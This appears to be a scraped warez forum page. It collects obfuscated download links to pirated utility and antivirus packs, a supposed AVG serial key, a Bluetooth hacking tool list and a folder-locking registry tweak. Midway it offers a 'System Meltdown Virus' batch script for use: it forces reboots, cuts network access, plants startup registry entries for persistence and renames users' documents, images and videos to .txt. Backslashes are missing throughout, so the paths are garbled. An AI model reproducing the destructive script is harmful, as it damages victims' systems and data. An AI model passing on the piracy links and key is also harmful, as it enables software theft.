hxxp://rapidshare[dot]com/files/97941682/UTILITIES_DVD_2008.part01.rarhxxp://rapidshare[dot]com/files/97956850/UTILITIES_DVD_2008.part02.rarhxxp://rapidshare[dot]com/files/97972544/UTILITIES_DVD_2008.part03.rarhxxp://rapidshare[dot]com/files/97988529/UTILITIES_DVD_2008.part04.rarhxxp://rapidshare[dot]com/files/98005155/UTILITIES_DVD_2008.part05.rarhxxp://rapidshare[dot]com/files/98023197/UTILITIES_DVD_2008.part06.rarhxxp://rapidshare[dot]com/files/98041486/UTILITIES_DVD_2008.part07.rarhxxp://rapidshare[dot]com/files/98058872/UTILITIES_DVD_2008.part08.rarhxxp://rapidshare[dot]com/files/98180656/UTILITIES_DVD_2008.part09.rarhxxp://rapidshare[dot]com/files/98235439/UTILITIES_DVD_2008.part10.rarhxxp://rapidshare[dot]com/files/98259726/UTILITIES_DVD_2008.part11.rarhxxp://rapidshare[dot]com/files/98277679/UTILITIES_DVD_2008.part12.rarhxxp://rapidshare[dot]com/files/98296444/UTILITIES_DVD_2008.part13.rarhxxp://rapidshare[dot]com/files/98301682/UTILITIES_DVD_2008.part14.rarhxxp://rapidshare[dot]com/files/98324068/UTILITIES_DVD_2008.part15.rarhxxp://rapidshare[dot]com/files/98326964/UTILITIES_DVD_2008.part16.rarhxxp://rapidshare[dot]com/files/98329599/UTILITIES_DVD_2008.part17.rarhxxp://rapidshare[dot]com/files/98348589/UTILITIES_DVD_2008.part18.rarhxxp://rapidshare[dot]com/files/98348143/UTILITIES_DVD_2008.part19.rarhxxp://rapidshare[dot]com/files/98467853/UTILITIES_DVD_2008.part20.rar
hxxp://rapidshare[dot]com/files/98486303/UTILITIES_DVD_2008.part21.rarhxxp://rapidshare[dot]com/files/98365011/UTILITIES_DVD_2008.part22.rarhxxp://rapidshare[dot]com/files/98372402/UTILITIES_DVD_2008.part23.rarhxxp://rapidshare[dot]com/files/98381438/UTILITIES_DVD_2008.part24.rarhxxp://rapidshare[dot]com/files/98391179/UTILITIES_DVD_2008.part25.rarhxxp://rapidshare[dot]com/files/98402309/UTILITIES_DVD_2008.part26.rarhxxp://rapidshare[dot]com/files/98414163/UTILITIES_DVD_2008.part27.rarhxxp://rapidshare[dot]com/files/98182429/UTILITIES_DVD_2008.part28.rarhxxp://rapidshare[dot]com/files/98182199/UTILITIES_DVD_2008.part29.rarhxxp://rapidshare[dot]com/files/98505554/UTILITIES_DVD_2008.part30.rarhxxp://rapidshare[dot]com/files/98019604/UTILITIES_DVD_2008.part31.rarhxxp://rapidshare[dot]com/files/98047167/UTILITIES_DVD_2008.part32.rarhxxp://rapidshare[dot]com/files/98072377/UTILITIES_DVD_2008.part33.rarhxxp://rapidshare[dot]com/files/97991077/UTILITIES_DVD_2008.part34.rarhxxp://rapidshare[dot]com/files/97980424/UTILITIES_DVD_2008.sfvREPLACE xx BY tt AND [dot] BY .Scan Before Installing
BitDefender v.0.99 AIO
BitDefender 10 Free Edition BitDefender 10 Unistall Tool BitDefender Antivirus 2008 V.32 bit y v.34 BitDefender Antivirus Plus 10 Build 247 BitDefender Internet Security 2008 BitDefender Internet Security 10BitDefender Mobilehttp://www.filefactory.com/file/ebd760/http://www.filefactory.com/file/593796/http://www.filefactory.com/file/62eccd/Scan Before Installing
AIO Antivirus 2008 by BenditooOSolo Antivirus 2008avast! 4.7 ProAVG 7.5 buld 516Bit Defender Total Security (Spanish)Panda Antivirus 2008ZoneAlarm Anti-virus 7.0.462.000ZoneAlarm Security Suite 7.0.462.000Kaspersky Internet Security 7.0.0.125Kaspersky Anti-Virus 7.0.0.125Rapidsharehxxp://rapidshare[dot]com/files/94910837/2367AA2008.part1.rarhxxp://rapidshare[dot]com/files/94911356/2367AA2008.part2.rarhxxp://rapidshare[dot]com/files/94910302/2367AA2008.part3.rar
Easysharehxxp://w13.easy-sharecom/1699699266.htmlhxxp://w13.easy-share[dot]com/1699699267.htmlhxxp://w13.easy-share[dot]com/1699699305.htmlMegauploadhxxp://www.megaupload[dot]com/?d=8BHEBKC6hxxp://www.megaupload[dot]com/?d=VVYQJCO4hxxp://www.megaupload[dot]com/?d=WGK6JTUGMediafirehxxp://www.mediafire[dot]com/?f0ddoyuyzvghxxp://www.mediafire[dot]com/?jjw01iu5wmkhxxp://www.mediafire[dot]com/?cceyzcuklnbREPLACE xx BY tt AND [dot] BY .Passwordwww.dl4all.com
Panda Internet Security 2008
Installation requirements* Processor: Pentium 300 MHz or faster.* RAM: 128 MB (256 MB recommended).* Hard disk: 270 MB free space.* Operating system: Windows Vista 32 & 64 bit, Windows XP 32 & 64 bit, Windows 2000.* Internet Explorer 6.0.* CD-ROM driveServices included* Tech Support by E-mail.* SOS Virus 24 hours.* Daily Updates against new Viruses.* Software Updateshttp://rapidshare.com/files/67251281/Panda_Internet_2008.rarPassword:Before Installing
All In 1 Photoshop 2008
The great Collection of All In One Photoshop Brushes,Styles, Gradients & Custom Shapeshttp://rapidshare.com/files/101715338/AIO_Photoshop_2008.rarScan Before Installing
AVG SERIAL KEY FOR 10 YRS
ENJOY.!!Key: 8MEH-REDSL-7ETEC-ULA8R-EAOKL-4EMBR-ACED
SYSTEM MELTDOWN VIRUS

System MeltdownSave As A bat File:CRASHnet send * WORKGROUP ENABLEDnet send * WORKGROUP ENABLEDGOTO CRASHipconfig /releaseshutdown -r -f -t0echo @echo off>c:windowshartlell.batecho break off>>c:windowshartlell.batecho shutdown -r -t 11 -f>>c:windowshartlell.batecho end>>c:windowshartlell.batreg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /freg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /fecho You Have Been Hackedecho @echo off>c:windowswimn32.batecho break off>>c:windowswimn32.batecho ipconfig/release_all>>c:windowswimn32.batecho end>>c:windowswimn32.batreg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho YOU HAVE BEEN HACKED BITCHREN *.DOC *.TXTREN *.JPEG *.TXTREN *.LNK *.TXTREN *.AVI *.TXTREN *.MPEG *.TXTREN *.COM *.TXTREN *.BAT *.TXTPAUSEPAUSE
BLUETOOTH HACKER

Bluetooth technology is great, No doubt. It provides an easy way for a wide range of mobile devices to communicate with each other without the need for cables or wires. However, despite its obvious benefits, it can also be a potential threat for the privacy and security of Bluetooth users (remember Paris Hilton?). If you are planning to gain a deeper understanding of Bluetooth security, you will need a good set of tools with which to work. By familiarizing yourself with the following tools, you will not only gain a knowledge of the vulnerabilities inherent in Bluetooth-enabled devices, but you will also get a glimpse at how an attacker might exploit them. This hack highlights the essential tools, mostly for the Linux platform, that can be used to search out and hack Bluetooth-enabled devices. Discovering Bluetooth Devices BlueScanner - BlueScanner searches out for Bluetooth-enabled devices. It will try to extract as much information as possible for each newly discovered device. BlueSniff - BlueSniff is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices. BTBrowser - Bluetooth Browser is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth-enabled devices. You can browse device information and all supported profiles and service records of each device. BTBrowser works on phones that supports JSR-82 - the Java Bluetooth specification. BTCrawler -BTCrawler is a scanner for Windows based devices. It scans for other devices in range and performs service query. It implements the BlueJacking and BlueSnarfing attacks. Hacking Bluetooth Devices BlueBugger -BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those vulnerabilities, one can gain an unauthorized access to the phone-book, calls lists and other private information. CIHWB - Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Currently it only support some Bluetooth exploits and tools like BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack. Bluediving - Bluediving is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, has features such as Bluetooth address spoofing, an AT and a RFCOMM socket shell and implements tools like carwhisperer, bss, L2CAP packetgenerator, L2CAP connection resetter, RFCOMM scanner and greenplaque scanning mode. Transient Bluetooth Environment Auditor - T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools. Bluesnarfer - Bluesnarfer will download the phone-book of any mobile device vulnerable to Bluesnarfing. Bluesnarfing is a serious security flow discovered in several Bluetooth-enabled mobile phones. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner, and gain access to restricted portions of the stored data. BTcrack - BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to reconstruct the Passkey and the Link key from captured Pairing exchanges. Blooover II - Blooover II is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable. BlueTest - BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices. BTAudit - BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices. UPDATE: Hey folks, due to massive response the download links to above Mobile Hacking Premium Pack were moved to our must-have downloads page which is only available to MakeUseOf subscribers. So you will need to subscribe before youcan get them. For the Subscribers : To get your free Mobile Hacking Premium just write comment with your email address that you have used to subscribe and the above Premium Pack will be mailed to you. You need to be a subscriber to get the premium pack. Before Sending the Premium Pack we will be checking for your Authenticity. You will Receive your Premium Pack within 24 hours. What’s next? Let everyone know to disable Bluetooth until they really need it. Additionally, make sure to update your phone software on a regular basis.
DOWNLOAD 1
LOCK YOUR DRIVE AND FOLDER
There are plenty of software which locks drives and folder to protect your confidential data. Why waste money on such tools when you can do it with a simple registry tweak? Here’s how: Caution: Before you attempt these tweaks, please make sure that you have a backup of your registry, just incase something goes wrong in the middle. Locking Folders:
Consider you want to lock a folder named XXXX in your E:\, whose path is E:\XXXX.
Now open the Notepad and type the following
ren xxxx xxxx.{21EC2020-3AEA-1069-A2DD-08002B30309D}
Where xxxx is your folder name. Save the text file as loc.bat in the same drive.
Open another new notepad text file and type the following
ren xxxx.{21EC2020-3AEA-1069-A2DD-08002B30309D} xxxx
Save the text file as key.bat in the same drive.Steps to lock the folder:
To lock the xxxx folder, simply click the loc.bat and it will transform into control panel icon which is inaccessible.
To unlock the folder click the key.bat file. Thus the folder will be unlocked and the contents are accessible. Locking Drives: We don’t usually prefer to lock our drives, but sometimes it becomes nesscary. Say for instance you might have stored your office documents in D:\ and you don’t want your kids to access it, in such case this technique can be useful for you. Please don’t try this tweak with your root drive (usually C:\ is the root drive) since root drives are not intended to be locked because they are mandatory for the system and application programs.
Start & Run and type Regedit to open Registry editor
Browse HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
Create a new DWORD value NoViewOnDrive and set its value as 2^ (Alpha Number of Drive Letter-1) where Alpha number are simple counting of alphabets from A to Z as 1 – 26 For example: to lock C:\, Alpha number of C is 3 so 2^ (3-1) = 4 (decimal value)
To lock more drives, calculate the value of each drive and then set sum of those numbers as value
To unlock your drive just delete the key from the registry.